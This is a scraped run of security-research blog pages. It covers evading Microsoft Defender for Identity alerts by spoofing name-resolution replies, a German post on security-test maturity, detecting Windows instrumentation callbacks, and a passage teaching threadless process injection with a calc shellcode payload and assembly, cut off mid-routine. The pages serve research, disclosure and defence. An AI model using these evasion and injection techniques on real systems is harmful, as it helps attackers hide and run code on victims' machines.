In the following image the flow can be seen using a spoofed certificate indicating that PC02’s (172.16.94.11) FQDN is DC02.jsc.lab:

Figure 24: Connection to port 3389 on PC02 by DfI
Figure 25: Spoofed certificate in RDP NNR method

NTLM over RPC

The last primary method uses the endpoint mapper on TCP port 135. When a client needs to call a Windows service, for example WMI, it first contacts the endpoint mapper on port 135 to discover on which dynamic port the requested service is actually listening. The mapper then returns that high port, and the client connects to it to complete the RPC exchange. In the case of DfI, a bind request is sent to the suspected malicious machine asking to bind on the RCP interface to the name service provider (NSPI) while using the NLTM security provider to authenticate. The response sent from the suspected machine contains the information relevant to DfI, while information related to the RCP interface and the binds is irrelevant since DfI cares only about about the information required to resolve host- and domain names. This information is included in the part where the NTLM negotiation happens. Besides the NTLM server challenge, the machine gives information about its NetBIOS and DSN names to DfI. At this particular time, no authentication happened between DfI and the machine and no tamper protection is included in these messages. This also allows the manipulation and spoofing of these messages to evade NNR detection. The two messages exchanged can be seen below:

Figure 26: NTLM over RCP NNR method

Secondary method: DNS lookup

When the primary methods (NetBIOS, RDP, NTLM over RPC) fail, a DNS lookup is used. This is the case if there is no response from any of the primary methods or if there’s a conflict in the responses received from two or more primary methods. Inspecting the DfI agent using Procmon, the described behavior is as follows:

Figure 27: Secondary method: DNS lookup

In the upper highlighted area, the three primary methods can be seen, while no connection to “PC02” could be established using these protocols and no NNR response will be received. The second area shows that two DNS requests are made by the DfI agent. The exact request made can be seen in Wireshark, when monitoring the loopback interface on DC01:

Figure 28: DNS lookup by DfI agent

The first request is a reverse DNS lookup, using the IP address from which the suspected attack originated to receive the hostname of the machine. The second request is a forward DNS lookup using the received hostname, serving as a secondary verification step to check whether the initial IP address is returned again.

Reviewing the impact of NNR vulnerability

It was discussed how the flaw in NNR could be exploited, leading to an evasion of alerts that rely on NNR. The impact of that vulnerability can also be rated by the number of alerts that are affected by it. Microsoft writes: “NNR data is crucial for detecting the following threats:”

  • Suspected identity theft (pass the ticket)
  • Suspected DCSync attack (replication of directory services)
  • Network-mapping reconnaissance (DNS)

Which means that at least three alerts depend on NNR to be triggered. While the DCSync alert appears here, there are two additional alerts not shown in this list that rely on NNR, as previously discussed. These two are the ADCS-ESC8 alert “Suspicious Domain Controller certificate request (ESC8)” and the pass-the-cert alert for domain controller machine account “Suspected suspicious Kerberos ticket request”. This makes at least five alerts in total, and there may be more alerts using NNR as detection technique.

It should be noted that NNR working in that way only applies to DfI version 2.X. DfI in version 3.0 uses NNR but does not include the attacker machine in its detection logic. For performing the name resolution, the defender device inventory is used, which is outside of the attacker’s control. The device inventory is a centralized overview of all discovered devices in the organization. The device information is collected through multiple of Microsoft’s security products like DfI and Defender for Endpoint.

Defender for Identity deployment overview

Furthermore, it can be inspected which Windows server can run DfI sensors in version 3.0 and which remains at version 2.2 to get a better idea of the risk posed by NNR.

Figure 29: DfI sensor deployment overview (https://learn.microsoft.com/en-us/defender-for-identity/deploy/deploy-defender-identity)

First, only domain controllers can use the sensor in version 3.0. The CA, Federation server and Entra connect server remain in sensor version 2.2. This makes alerts that are generated from DfI agents running on these servers and depending on NNR vulnerable to being evaded.

For domain controllers the usage of version 3.0 is only possible when running as Windows Server 2019 or higher and when Microsoft Defender for Endpoint is enabled on that Windows Server.

Disclosure to Microsoft MSRC

A security advisory about the flaw in the core feature NNR affecting DfI version 2.2 was disclosed to Microsoft via the MSRC portal on February 22, 2026. The vulnerability was not recognized by Microsoft and was reasoned to be below the bar for immediate servicing. As far as the answer from MSRC can be interpreted, no fix will be issued.

Conclusion

While this blogpost focused on alerts that could be evaded, the summary focuses on the results from these investigations. The biggest problem DfI faces are issues related to the involvement of the assumed attacker into the detection logic using indicators to make decisions, controlled by him. This problem can be observed when looking at the pass-the-cert alert, where DfI attempts to detect the attack through attacker-controlled indicators. The problem also becomes evident through the reliance on information provided by self-signed certificates under the attacker control, like the age of a certificate, which is used to determine if further detection logic needs to be applied. Also, the NNR method using RDP relies on information from self-signed certificates and builds decisions on this.

The general problem with the NNR feature in DfI version 2.2 is that it involves the suspected attacker machine while using techniques that do not provide authentication or tamper protection, thereby giving malicious actors the possibility to evade NNR-based detection logic.

Using a trusted database, such as the Defender device inventory, to resolve raw IP addresses to hostnames is a good approach, since it cannot be interfered with by a malicious actor, but it should be available in all DfI versions, not only version 3.0.

Despite various technical issues and the fact that Microsoft does not consider these as vulnerabilities and has no plans to make any changes, security professionals can still take steps to improve security and detectability. This will be described in the second blogpost: Microsoft Defender for Identity evasions in 2026 – Part II.

References

  1. https://www.synacktiv.com/publications/a-dive-into-microsoft-defender-for-identity
  2. https://www.synacktiv.com/publications/understanding-and-evading-microsoft-defender-for-identity-pkinit-detection
  3. https://learn.microsoft.com/en-us/defender-for-identity/nnr-policy
  4. https://learn.microsoft.com/en-us/defender-xdr/pilot-deploy-overview
  5. https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf
  6. https://learn.microsoft.com/en-us/defender-for-identity/deploy/deploy-defender-identity
  7. https://blog.redteam-pentesting.de/2025/windows-coercion/
  8. https://en.hackndo.com/ntlm-relay/#preliminary
Red Teaming

Microsoft Defender for Identity evasions in 2026 – Part I

June 16, 2026 – Microsoft Defender for Identity (DfI) is one of Microsoft’s key solutions for detecting identity-based attacks in Active Directory environments – but how well does it hold up against a skilled attacker? This two-part blog post dives into DfI’s detection capabilities for high-impact attacks such as shadow credentials, pass-the-cert, ESC8, and DCSync. Additionally, it uncovers a spoofing and relaying vulnerability in DfI’s Network Name Resolution component that can be used to evade multiple alerts, and offers blue team perspectives on closing these gaps.


Author: Jakob Scholz

Mehr Infos »
Red Teaming

Windows Instrumen­tation Call­backs – Part 4

February 10, 2026 – In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Author: Lino Facco

Mehr Infos »
Do you want to protect your systems? Feel free to get in touch with us.

Reife­grad für Sicherheits­über­prüfungen

Search

Reife­grad für Sicherheits­über­prüfungen

May 11, 2026

Reifegrad für Sicherheitsüberprüfungen: die richtige Prüfung zur richtigen Zeit

Auf den cirosec TrendTagen habe ich kürzlich einen Vortrag zum Thema Pentesting, Assumed Breach, Red Teaming, TLPT & Co. gehalten. Besonders die grafische Einordnung der einzelnen Prüfungsformen nach Reifegrad und Budget stieß auf großes Interesse. Eine kurze Zusammenfassung zum Nachlesen:

Eine Sicherheitsprüfung ist nur dann effizient, wenn sie zum Reifegrad des Unternehmens passt. Wer seine Hausaufgaben bei der Basis-Hygiene noch nicht gemacht hat, verschwendet mit einem komplexen Red Teaming wertvolle Ressourcen und kann vom Mehrwert eines derartigen Projekts nicht profitieren.

Netzwerkscans, Penetrationstests von Anwendungen oder Initial-Access-Prüfungen benötigen kaum Voraussetzungen. Hier geht es darum, effizient Schwachstellen zu finden. Bei einer Assumed-Breach-Analyse liegt der Fokus auf der Identifikation von Schwachstellen im internen Netzwerk und im Active Directory. Erkennungs- und Reaktionsfähigkeiten spielen dabei noch keine Rolle. Dadurch lassen sich derartige Prüfungen mit einem überschaubaren Budget durchführen. Dies erlaubt auch eine entsprechende Regelmäßigkeit.

Sobald Erkennungs- und Reaktionsfähigkeiten vorhanden sind, werden Purple Teamings / War Gamings oder Assumed Breach Red Teamings relevant. Hierbei wird nicht mehr nur die Prävention geprüft, sondern gezielt das Zusammenspiel zwischen Angriff (Red-Team) und Verteidigung (Blue-Team) trainiert.

Klassisches, kompaktes und kontinuierliches Red Teaming setzt eine solide Infrastruktur und etablierte Incident-Response-Prozesse voraus. Das Ziel ist die Simulation realer, langanhaltender Angriffe. Solche Projekte zielen in der Regel auf das gesamte Unternehmen ab und liefern Erkenntnisse auf unterschiedlichsten Ebenen.

Eine besondere Form des Red-Team-Assessments ist der Threat-led Penetration Test (TLPT) nach TIBER. Diese Durchführungsform ist jedoch nur für besonders reife Unternehmen aus dem Finanzsektor relevant. Detaillierte Informationen dazu finden Sie im separaten Blogpost zu diesem Thema.

Zusammengefasst: Man muss nicht mit einem Red Teaming starten. Wer sich bei der Durchführung von Sicherheitsüberprüfungen am Reifegrad orientiert, baut Sicherheit nachhaltig und budgetgerecht auf. Unternehmen mit einem fortgeschrittenen Reifegrad profitieren hingegen von den Erkenntnissen aus den ganzheitlichen Angriffen eines Red-Team-Assessments.

Eine Übersicht zu möglichen Schwerpunkten von Penetrationstests und Red-Team-Assesessments gibt es auf unserer Website.

Michael Brügge

Managing Consultant

Category
Date

Further blog articles

Red Teaming

Microsoft Defender for Identity evasions in 2026 – Part I

June 16, 2026 – Microsoft Defender for Identity (DfI) is one of Microsoft’s key solutions for detecting identity-based attacks in Active Directory environments – but how well does it hold up against a skilled attacker? This two-part blog post dives into DfI’s detection capabilities for high-impact attacks such as shadow credentials, pass-the-cert, ESC8, and DCSync. Additionally, it uncovers a spoofing and relaying vulnerability in DfI’s Network Name Resolution component that can be used to evade multiple alerts, and offers blue team perspectives on closing these gaps.


Author: Jakob Scholz

Mehr Infos »
Red Teaming

Windows Instrumen­tation Call­backs – Part 4

February 10, 2026 – In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Author: Lino Facco

Mehr Infos »
Reverse Engineering

Windows Instrumen­tation Call­backs – Part 3

January 28, 2026 – In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

Author: Lino Facco

Mehr Infos »
Command-and-Control

Beacon Object Files for Mythic – Part 3

December 4, 2025 – This is the third post in a series of blog posts on how we implemented support for Beacon Object Files (BOFs) into our own command and control (C2) beacon using the Mythic framework. In this final post, we will provide insights into the development of our BOF loader as implemented in our Mythic beacon. We will demonstrate how we used the experimental Mythic Forge to circumvent the dependency on Aggressor Script – a challenge that other C2 frameworks were unable to resolve this easily.

Author: Leon Schmidt

Mehr Infos »
Command-and-Control

Beacon Object Files for Mythic – Part 2

November 27, 2025 – This is the second post in a series of blog posts on how we implemented support for Beacon Object Files (BOFs) into our own command and control (C2) beacon using the Mythic framework. In this second post, we will present some concrete BOF implementations to show how they are used in the wild and how powerful they can be.

Author: Leon Schmidt

Mehr Infos »
Command-and-Control

Beacon Object Files for Mythic – Part 1

November 19, 2025 – This is the first post in a series of blog posts on how we implemented support for Beacon Object Files into our own command and control (C2) beacon using the Mythic framework. In this first post, we will take a look at what Beacon Object Files are, how they work and why they are valuable to us.

Author: Leon Schmidt

Mehr Infos »
Do you want to protect your systems? Feel free to get in touch with us.

Windows Instrumen­tation Call­backs – Part 4

Search

Windows Instrumen­tation Call­backs – Part 4

February 10, 2026

Windows Instrumentation Callbacks – Detection and Counter Meassures, Part 4

Introduction

This multi-part blog series will be discussing an undocumented feature of Windows: instrumentation callbacks (ICs).

If you don’t yet know what ICs are, we strongly recommend you read the first part of this series. If you are curious about what can be done with them, we recommend also reading the second and third part.

In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Disclaimer

  • This series is aimed towards readers familiar with x86_64 assembly, computer concepts such as the stack and Windows internals. Not every term will be explained in this series.
  • This series is aimed at x64 programs on the Windows versions 10 and 11. Neither older Windows versions nor WoW64 processes will be discussed.

Detection

In the first blog post we reversed NtSetInformationProcess to find out that the PROCESSINFOCLASS enum value 0x28 is used to set an IC. In the kernel the member InstrumentationCallback of the corresponding KPROCESS structure then gets set to the passed callback address. This of course means that a kernel driver could simply check the KPROCESS structure of the process to check if an IC is set. Before we move on to user-mode ways of detecting ICs, let’s cover something we haven’t in any of the previous posts: unregistering ICs.

Unregistering ICs

We thought “How hard can it be? We can simply call NtSetInformationProcess with a null pointer to unset it.” Correct… sometimes… if the process uses control flow guard (CFG), your IC would still be set as a null pointer is no valid call target. In the first blog post we already mentioned that ntoskrnl!NtSetInformationProcess+0x1d09 is where the callback address gets set in the KPROCESS structure, so let’s go there in the decompiler. In this case we renamed the relevant stack variable that contains the callback address to “ic_addr”. As can be seen, there is a call to MmValidateUserCallTarget with that address before it gets set in KPROCESS:

Consultant

Category
Date
Navigation

If we decompile MmValidateUserCallTarget, it quickly becomes clear that this has something to do with CFG as can be seen by the call to MiIsProcessCfgEnabled because otherwise simply 1 is returned.

A null pointer is very obviously not a valid call target; however, let’s quickly prove that this function isn’t successful by using a kernel debugger and placing a breakpoint on NtSetInformationProcess+1ccc, which is where MmValidateUserCallTarget is executed. Additionally, we placed a breakpoint on NtSetInformationProcess+1d09 to show where the IC gets set in the KPROCESS struct. As can be seen, when the address for the IC is passed to MmValidateUserCallTarget, the function returns 1 and KPROCESS is updated. However, when a null pointer is passed, 0 is returned.

You can’t see if KPROCESS is updated after the last g instruction; you will just have to believe us that it didn’t. But as can be seen in the previously shown decomplication of NtSetInformationProcess, the relevant code branch to update KPROCESS isn’t even executed, as instead ExRreleaseRundownProtection is called.

This means, an IC can only be entirely unregistered (be set back to 0) if a process doesn’t have CFG enabled. Otherwise, it can only be updated to a new valid call address and never be set back to the original value the InstrumentationCallback member value had at the processes start: 0. While any valid call target’s address can be used, the address should be carefully selected, as most will of course crash the program as random code would be executed. The updated callback of course still needs to do what is expected of an IC, which is to continue execution by jumping to r10. This also means that if a DLL that gets loaded into a CFG-enabled process sets an IC with the callback being in its own memory region, the process will crash once that DLL is unloaded and the DLL’s memory including the callback gets deallocated. In this case the callback would also need to get updated before the DLL is unloaded if the process shouldn’t crash.

For CFG-enabled processes it is thus not possible to hide from kernel mode drivers that an IC was set, as they can simply check if the process’s KPROCESS.InstrumentationCallback != 0. For non-CFG processes the InstrumentationCallback member can be restored to its original value.

In addition to that, enabling CFG makes ICs easier to detect on a big scale, as poorly written IC implementations will crash the process, which will be written to event logs. This is of course not great, but what’s better? Processes crashing, which indicates something weird is going on, or working processes with an attacker’s code inside?

User mode

That it is possible detect if an IC is set from kernel mode was obvious, as we discussed in the first blog part already that it’s merely a member of the process’s KPROCESS structure. Let’s discuss the way more interesting scenario: detecting from user mode if an IC is set on one’s own process. If you step through the process with a debugger, you will obviously be able to tell that an IC is registered if a syscall that is stepped over causes the code flow to magically jump to somewhere else. Let’s discuss different ways.

If an IC is set with NtSetInformationProcess, the logical way of checking if an IC is set would be to call NtQueryInformationProcess instead. However, when we disassemble/decompile NtQueryInformationProcess and search for the switch case on the second parameter, which is the PROCESSINFOCLASS, we can see that it is not implemented. This is shown by the following shortened decompilation:

NtQueryInformationProcess(arg1, proc_info_class, …)
[…]
+0x002b        int64_t proc_info_class_copy = (int64_t)proc_info_class;
[…]
+0x02f9            switch (proc_info_class_copy) {
[…]
+0x3bf6                case 5:
+0x3bf6                case 6:
+0x3bf6                case 8:
+0x3bf6                case 9:
+0x3bf6                case 0xb:
+0x3bf6                case 0xd:
+0x3bf6                case 0x10:
+0x3bf6                case 0x11:
+0x3bf6                case 0x19:
+0x3bf6                case 0x23:
+0x3bf6                case 0x28:
+0x3bf6                case 0x29:
+0x3bf6                case 0x30:
+0x3bf6                case 0x35:
+0x3bf6                case 0x38:
+0x3bf6                case 0x39:
+0x3bf6                case 0x3e:
+0x3bf6                case 0x3f:
+0x3bf6                case 0x44:
+0x3bf6                case 0x4e:
+0x3bf6                case 0x50:
+0x3bf6                case 0x53:
+0x3bf6                case 0x56:
+0x3bf6                case 0x5a:
+0x3bf6                case 0x5b:
+0x3bf6                case 0x5d:
+0x3bf6                case 0x5f:
+0x3bf6                {
+0x3bf6                    result = -0x3ffffffd;
+0x3bf6                    break;
+0x3bf6                }
[…]

As you might remember, we used 0x28 for setting the IC.

This means, we can’t use NtQueryInformationProcess to find out if an IC is set. We don’t know of any user mode function that allows querying for the IC; that does of course not mean that it doesn’t exist. By dumping kernel memory, we could of course again read out the KPROCESS structures to check for ICs, but this would obviously require a driver or some way to execute code in the kernel memory, riiiight Microsoft? There is a way (/are ways?) of dumping kernel memory including the KPROCESS structures entirely from user mode without needing to load any drivers yourself. We won’t tell you how this is done, as we are already spoon-feeding you enough 😉 Additionally, that would be a moral gray area; we want to keep EDRs/ACs a step ahead of attackers.

rcx and r10

In the first blog post we briefly mentioned that we recommend attaching a debugger to a program with and without an IC set to check the values of registers after syscalls but didn’t dive deeper into it. I attached WinDbg to a random process and set a breakpoint on a random syscall (ntdll!NtWriteVirtualMemory+0x12). As can be seen in the following screenshot, rcx was changed to the address of the instruction after the syscall, that is the ret instruction. Also, r10 was zeroed.

Now compare this to the following screenshot, which was taken after an IC was set:

As expected, r10 contains the address of the actual return address. The picture also shows that rcx contains the address of the start of the IC instead of the actual return address.

This means, we can detect poorly written ICs by checking rcx and r10 at the ret instruction after the syscall, that is the instruction it would normally execute if no IC was set. These registers can of course be arbitrarily changed by the IC, but that needs to be kept in mind by the author. If rcx isn’t properly set, it does not only leak that an IC is set but also where it is located in memory, which could be used to automatically dump it or for something even more interesting ‑ which we will get to.

Preventing ICs from getting set

If it is hard to detect whether an IC is set or not, we could try preventing others from setting them in the first place. This is not very easy to do. Let’s assume two different starting points of an attacker: the attacker is inside the process on which he wants to set an IC or the attacker is in another process. If the attacker is already in the kernel, you got entirely different problems so we will not discuss that.

One’s own process context

In the second part of this blog post, we already discussed one way of preventing the IC from getting overwritten, which was done by hooking NtSetInformationProcess. For a simple attacker this suffices; however, the hook can be avoided through direct and indirect syscalls. Even if the syscall instruction in NtSetInformationProcess is hooked, an attacker could use the syscall instruction of another Windows API to not run into the hook. This would mess up the callstack, but to detect that, a kernel driver would be required as once the syscall was executed and returned to user mode, the new IC is already set. Another idea is to place a page guard on the memory page of NtSetInformationProcess after registering an appropriate exception handler to detect SSN reads of the SSN of NtSetInformationProcess or nearby syscalls; this would however take a toll on performance.

Another detection mechanism is using a heartbeat. The originally set IC could use a counter that increments on every IC execution, while some regular code that is not in the IC checks every few seconds if the counter was incremented. If the counter wasn’t incremented in a while, the IC was overwritten, as syscalls are, depending on the program, constantly made. This way the program could then try reregistering its own IC, which is not guaranteed to succeed, but the program can again detect through the counter if reregistering the IC was successful.

If the attacker’s IC is adjusted to the program, he could of course also increment that counter himself, or even more interesting: if the previous ICs address was leaked through the beforementioned ways, the attacker’s IC could call the previous IC through its own IC while filtering what is passed to it. This means, it is not only interesting for attackers to hide that an IC is set but also for defenders as there’s no proper way of being entirely sure that your IC is the registered one. At this point we are talking about a very sophisticated attacker, as the IC would need to be highly adapted. If the victim process does not repeatedly dump the IC address itself (very unlikely), it has no way of knowing if its own IC was overwritten, as any detection logic in that IC can be automatically executed by calling the IC from the new, actually set IC.

Other process context

As initially mentioned, setting an IC on another process requires the SeDebugPrivilege. This is a very extensive privilege. If the user does not have this privilege, there is no way for him to set an IC on another process. This means, properly hardening your environment and stripping users of unneeded privileges is also the best defense against ICs being set on other processes.

Let’s assume the user has the SeDebugPrivilege. In that case the victim process can’t do much against an IC being set other than repeatedly scanning for open handles and closing those with the PROCESS_SET_INFORMATION access mask. This contains a race condition, as with the correct timing an IC can still be set. Of course, once the IC is set the same detection mechanisms mentioned in “One’s own process context” apply again.

Closing words

This marks the end of this blog series. Congratulations if you read through all of it! If you got questions or built upon this research (as there’s still a lot to discover with ICs), feel free to reach out.

Further blog articles

AD Security

Microsoft Defender for Identity evasions in 2026 – Part II

June 17, 2026 – The first blogpost highlighted the detection capabilities and the resulting evasion options for Microsoft Defender for Identity (DfI). To complement the first part, the second part will present some alternative detection possibilities for the defensive side to improve visibility and security, as well as the upgrade from DfI version 2.2 to DfI version 3.0.

Author: Jakob Scholz

Mehr Infos »
Red Teaming

Windows Instrumen­tation Call­backs – Part 4

February 10, 2026 – In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Author: Lino Facco

Mehr Infos »
Reverse Engineering

Windows Instrumen­tation Call­backs – Part 3

January 28, 2026 – In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

Author: Lino Facco

Mehr Infos »
Do you want to protect your systems? Feel free to get in touch with us.

Windows Instrumen­tation Call­backs – Part 3

Search

Windows Instrumen­tation Call­backs – Part 3

January 28, 2026

Windows Instrumentation Callbacks – Injections, Part 3

Introduction

This multi-part blog series will be discussing an undocumented feature of Windows: instrumentation callbacks (ICs).

If you have not yet read the first and second part of this series, we strongly recommend you read it to find out what ICs are and how to set them.

In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

Disclaimer

  • This series is aimed towards readers familiar with x86_64 assembly, computer concepts such as the stack and Windows internals. Not every term will be explained in this series.
  • This series is aimed at x64 programs on the Windows versions 10 and 11. Neither older Windows versions nor WoW64 processes will be discussed.
  • This post contains much assembly code; don’t be a script kiddie – take your time to understand what you’re doing instead of just copy-pasting!

Recap

In the first blog post we learned how to install an IC on a process and how to use that callback to interact with specific syscalls.

We learned this by the example of intercepting the syscall made by OpenProcess inside the subfunction NtOpenProcess. After intercepting NtOpenProcess, we closed the handle that was opened and spoofed a return value of STATUS_ACCESS_DENIED.

In the second part of the series, we learned how to hook arbitrary code in the current process context with ICs using exceptions.

However, we haven’t yet set an IC on another process even though we learned in the first part of this series that this should be possible with the SeDebugPrivilege. Due to the IC getting executed as a callback to every returning syscall, setting an IC on another process would mean getting code execution in that processes’ context, which can be used for a process injection.

Process injection

If you understood the blog series so far, it is very likely that you know what a process injection is. Let’s break down what is normally needed for a regular process injection, that is injecting code into another process. Depending on whether you’re familiar with the concept of virtual address spaces and virtual memory in general, trying to access memory in another process would result in expected or unexpected results. The code normally needs to get written to the other process. Obviously, to write the code to the other process’ memory space, you need to have a handle to the process with sufficient permissions and need to know where to write the code. For this you normally have two options: allocating memory in the other process context or overwriting an existing executable memory region. After the code was written to an executable memory region, it needs to get executed. The most basic process injections use the CreateRemoteThread function for this. Other execution mechanisms are, for example, API hooking, early bird APC injections or thread hijacking. There are many ways, but they all effectively just execute the written code. There are multiple websites online that collect different execution mechanisms; however, most don’t include ICs. While researching ICs, I found a blog post by Black Lantern Security about detecting process injections. They briefly mentioned using ICs for call stack analysis to detect injections, which is a great use case for them, but it can also be used for exactly what it should detect. That would also have the bonus effect of overwriting their IC, basically removing those security checks. In the next part of this blog series, we will cover ICs from a more defensive standpoint and how to protect against your own IC being overwritten.

I also found a blog post by splinter_code who seems to have already written a blog post about using ICs for process injections in 2020. Don’t worry, we will of course expand on that and not copy his work. How complicated your IC injection code needs to be heavily depends on your payload. Assume you, for example, only want to make one WinExec call and your payload in total got like ten assembly operations, this won’t add a massive overhead to your program. You could just directly call the payload in the IC (assuming you added a way to disable syscall recursion in the IC), but once you use a payload that yields, for example a C2 agent, the program will stop working/run into issues because a required thread was hijacked. splinter_code solved this by creating a new thread, which is a valid approach. However, I wanted to avoid thread creation callbacks. So, how do we execute code without spawning a new thread and without causing the thread that called the IC to yield for long? By instead spawning a process. Just kidding, let’s reuse the hooking method we used in the previous blog post and instead hook a thread exit to hijack the thread. Threadless injections are no novel concept, but they normally use byte patches or register an exception handler for patchless hooking. Using ICs we can avoid registering an exception handler. In our case we still set a hardware breakpoint, but you could also, for example, use page guards.

To keep this post brief, we will not cover the following relevant topics, as they are not specific to this injection technique and there are multiple ways of implementing those: process ID enumeration, handle opening, memory allocation, memory writing.

Only one note on handle opening: a cautious reader of the OpenProcess MSDN page might’ve read the following part: “If the caller has enabled the SeDebugPrivilege privilege, the requested access is granted regardless of the contents of the security descriptor.” As said in the recap, we found out that the SeDebugPrivilege is required to set an IC on another process in the first blog post. Herein lays the fundamental “problem” of using an IC as an injection technique. The SeDebugPrivilege is a very powerful privilege, as it effectively disables security checks. This means, the injector already needs extensive privileges on the computer to use an IC as an injection technique. As mentioned by Microsoft, members of the Administrators group have the SeDebugPrivilege by default. This also means that for you to test your injector you need that privilege, for example by launching the injector from an administrative PowerShell.

Core injection logic

To simplify the rest of the blog post, let’s define some words that we will use:

  • Payload: This is the code that should get executed as the goal of the injection, in our case it will be a WinExec call that spawns a calculator. In your case it could be whatever, it could for example also be a manual mapper that maps an entire DLL into the victim process.
  • Payload wrapper: This includes all the code that sets up the payload execution. We will define the specific requirements later, but the wrapper is what the IC will execute. It is basically the IC bridge from the previous posts with some additional logic, just that it is this time injected into another process for the IC to execute there and not in its own process context. The wrapper remains static, only the payload changes.
  • Wrapped payload: Both the payload and the payload wrapper. The wrapped payload will be allocated and written to the victim process, not the payload and payload wrapper individually.

In the previous two blog posts we did not delve further into the build system, as we simply linked our C++ code with the assembly IC bridge; however, this isn’t what we will be doing this time. Both the payload and payload wrapper need to be position-independent, as they shouldn’t be executed in our process’s context but instead the victim’s. This also means that we need both the starting address and the size of the assembly code to copy it over to the other process. I find the easiest way to do this is to write the entire shellcode in an assembly file and then use a build system such as CMake with pre-compile steps to first assemble the assembly and then write them to a C++ header file that simply contains a C++ array with the assembled bytes in it.

In other words: the CMakeLists.txt file contains multiple add_custom_commands, which first executes the assembler (we’re using nasm), then uses objcopy to copy out the .text section of the object file into a temporary binary file and then executes a Python script to read in the binary file and converts it into a C++ array, which is written to a header file that is part of the CMake targets’ sources. In this case, we only did this for the payload wrapper.

Payload

As mentioned before, we’re using nasm as assembler for this post. “;” marks comments in nasm.

For our testing we used the following hard-coded payload:

mov ecx,0x636c6163 ; calc
push rcx
mov rcx, rsp
mov r14,0x7fffffffffffffff ; will be replaced with WinExec

sub rsp, 0x28 ; Shadow space + alignment
call r14
add rsp, 0x30
ret

Consultant

Category
Date
Navigation

As can be seen, a null-terminated “calc” string is pushed onto the stack and used as an argument to a call to 0x7fffffffffffffff after the stack was aligned (RSP % 0x10 = 0).

But why are we using 0x7fffffffffffffff as a call target? We aren’t, we are simply using it as a placeholder. ASLR changes the memory address of, among other things, WinExec. This means, WinExec’s address isn’t known at compile time. There are two solutions for this:

  1. We add a dynamic resolution function to the shellcode with, for example, a PEB walk.
  2. We abuse the fact that ntdll, kernel32 and kernelbase (the DLLs we will require) have the same base address in all processes, as it only gets changed on a reboot. This means, the address of WinExec in the injector is the same as in the process to inject into.

In this case we utilize option 2 to keep the shellcode small. Using a search function, 0x7fffffffffffffff will be replaced before it is injected into the other process to update it to its correct address. This is possible because, as mentioned, we copy the assembled bytes of the assembly code to an array, meaning the required bytes are not in R-X memory but in RW-. This could of course also be rewritten so that it reads in a payload instead of having it hard-coded.

The payload can be anything, as long as it considers the following restrictions:

  • Needs to be position-independent
  • Needs to properly restore the stack after execution or terminate its own thread

Payload wrapper

So, what does the payload wrapper need to include? Everything to correctly set up the payload execution, in other words all the IC logic. First off, we don’t want our payload to execute multiple times, so in our example have multiple calculators pop up. That means, if we don’t want to unregister our IC after execution, we need a flag to signal when the payload was already executed. As the payload should execute once in the entire process and not once every thread, we will need a process-wide flag. We will implement a process-wide flag and not unregister the IC, as we can’t spoon-feed you everything 😉

Also, as mentioned, we will be setting a hardware breakpoint on a thread exit (RtlExitUserThread). It would be very inefficient if we set the hardware breakpoint again and again on every IC call. So, we will also need a thread-local flag to signal when the breakpoint was set, so this step will be skipped on all following IC calls from that thread.

The injected IC should execute the following rough pseudo-code logic:

bool payload_executed = false
bool thread_set_hardware_bp = false
callback(void* ic_origin) {
if (!payload_executed && !thread_set_hardware_bp) {
   thread_set_hardware_bp = true
   if (!set_hwbp(RtlExitUserThread)) // Does syscall
     thread_set_hardware_bp = false   
   return
}
if (!is_exception(ic_origin))
   return
if (exception_origin != RtlExitUserThread)
   return
remove_hwbp(RtlExitUserThread) // Does syscall
if (!payload_executed) {
   payload_executed = true 
   execute_payload() // (Most likely) does syscall
}
restore_context()
}

In the previous posts we used a flag to avoid recursion; in this case we don’t need a second thread flag. The only way for a syscall to happen if the exception doesn’t come from our breakpoint is through set_hwbp, which is why the flag is enabled before the function call and unset if the breakpoint wasn’t set successfully.

This means, GetThreadContext and SetThreadContext, the two functions issuing a syscall down the line, trigger the IC again but since they aren’t the expected exception they just return from the IC.

A process-local flag can be set by allocating memory with read and write permissions and using a certain address as a flag. As we want to avoid any RWX memory allocations, we will need two memory regions with different permissions: RW- for the flag and R-X for the code itself. RWX allocations should be avoided due to them being highly suspicious. This causes another issue: the flag address can’t be known at runtime due to being dynamically allocated. If we allocated the memory for the flag from inside the executable code that was written to the victim process, we would only have the address of the flag in the same IC call in which the flag was allocated, due to the memory region being not writable, so we couldn’t store it.

Our solution for this is to use a placeholder address for the flag such as with the WinExec address in the payload. The injector first allocates the memory for the flag and then searches for the placeholder inside the compiled wrapper that was written to an array through prebuild steps, replaces it with the address of the allocated memory and only then writes the wrapper to the victim process.

Setting a hardware breakpoint

As mentioned, we will use the same hooking technique used in the previous blog post to hook RtlExitUserThread, just that this time we will need to inject that code into the other process meaning it needs to be position-independent shellcode instead of a regular C++ function. This does not only apply to setting the hardware breakpoint but all the code that needs to get injected. As this is a bunch of assembly instructions, let’s start by writing the helper functions before the core execution logic.

The following code basically does the following:

bool set_dr(DWORD64 bp_address, bool enable) {
CONTEXT context = { .ContextFlags = CONTEXT_DEBUG_REGISTERS };
GetThreadContext(GetCurrentThread(), &context);
context.Dr3 = bp_address;
context.Dr7 |= 1ULL << 6;
SetThreadContext(GetCurrentThread(), &context);
}

Approximately this can be done with the following code; we just hard-coded the usage of Dr3 for no specific reason. You could of course also use other debug registers or add the possibility to add all of them.

; rcx = breakpoint address
; rdx = Enable (1) / Disable (0)
; Return: Rax != 0 = success
; RSP needs to be aligned
set_dr:
   ; Save used registers
   push r14
   push r13
   push rdi
   push rbx
   mov r13, rcx
   mov rbx, rdx
   sub rsp, 0x4d8 ; Size of CONTEXT struct + 8 alignment
   mov rdi, rsp ; CONTEXT base
